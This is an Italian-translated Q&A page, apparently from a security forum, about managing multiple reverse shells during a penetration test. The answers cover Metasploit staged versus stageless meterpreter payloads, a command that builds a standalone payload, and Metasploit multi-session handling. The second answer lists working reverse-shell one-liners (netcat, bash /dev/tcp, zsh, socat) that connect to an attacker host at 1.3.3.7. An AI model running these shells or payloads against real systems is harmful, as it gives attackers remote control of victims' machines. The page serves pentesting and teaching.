Pentest: gestisce più shell inverse

5

Sto facendo un pentest e mi aspetto che le shell inverse da più shell si connetteranno come: -

nc <my-ip> <my-port> -e /bin/bash

Tuttavia, sto cercando di capire il modo migliore per gestire queste connessioni in entrata. Ci sono suggerimenti sulle migliori pratiche relative a questo? Ho dato un'occhiata alla shell meterpreter di metasploits - tuttavia sembra che stia inviando un payload al client. Non ho bisogno di questo, ho solo bisogno che le connessioni vengano gestite correttamente.

    
posta 07.12.2013 - 14:52
fonte

2 risposte

3

Metasploit ha più payload suddivisi in single, stager e stage. Il singolo carico utile è incapsulato in un unico file eseguibile e non richiede download aggiuntivi. Ad esempio, payload / windows / shell_reverse_tcp è un singolo payload che può essere utilizzato come eseguibile standalone.

Per impostazione predefinita, il payload meterpreter è un payload progressivo. Se lo si genera tramite msfconsole / msfpayload / msfvenom, viene generata la prima fase e, quando viene eseguita, scarica la seconda fase metsrv.dll dal gestore. Tuttavia, c'è un payload stand-alone meterpreter al di fuori dell'albero ufficiale Metasploit creato da Sherif Eldeeb. Puoi scaricarlo dal repository github di Sherif Eldeep .

Da github repositoty, scarica l'archivio ultimet.zip e genera l'eseguibile standalone come:

ultimet.exe -h <LHOST> -p <LPORT> -t "reverse_tcp" --msfpayload

-t è il trasporto che scegli. È possibile anche altri mezzi di trasporto come il reverse / binding http (s). Il comando precedente creerà un nuovo eseguibile nella directory avente un nome REVERSE_TCP__LPORT.exe. Questo è un eseguibile meterpreter standalone dove il secondo stage metsrv.dll è incapsulato nello stesso eseguibile. Tuttavia, si noti che il trasporto reverse_https ha attualmente un bug in cui la connessione si blocca ogni volta che ci si connette al gestore. reverse_tcp è molto affidabile.

Utilizza l'opzione false ExitOnSession nel msfconsole e puoi gestire tutte le sessioni che vuoi. Inoltre, ho notato che più connessioni possono essere gestite in modo più efficiente attraverso Armitage più facilmente, ma è solo una questione di preferenza. msfconsole è anche molto utile nella gestione di più connessioni in cui è possibile automatizzare molte attività di post sfruttamento mediante script di risorse.

Aggiornamento: come da richiesta pull 4925 , meterpreter stageless fa ora parte della distribuzione ufficiale di Metasploit. Questa non è integrazione del lavoro di Sharif, ma piuttosto una completa riscrittura da OJ Reeves.

    
risposta data 07.12.2013 - 18:26
fonte
0

Potresti aver bisogno di questo strumento che ho creato:

link

Questo è un gestore di sessioni / client di shell inverse multiple tramite terminale.

Utilizzo semplice:

Lato attaccante: python Reverse-Shell-Manager.py 0.0.0.0 4444

I lati della vittima

Linux:

nc -e /bin/bash 1.3.3.7 4444
bash -c 'bash -i >/dev/tcp/1.3.3.7/4444 0>&1'
zsh -c 'zmodload zsh/net/tcp && ztcp 1.3.3.7 4444 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:1.3.3.7:4444  

Windows:

nc.exe -e /bin/bash 1.3.3.7 4444

Ecco due video che possono aiutarti:

risposta data 31.08.2018 - 09:15
fonte

Leggi altre domande sui tag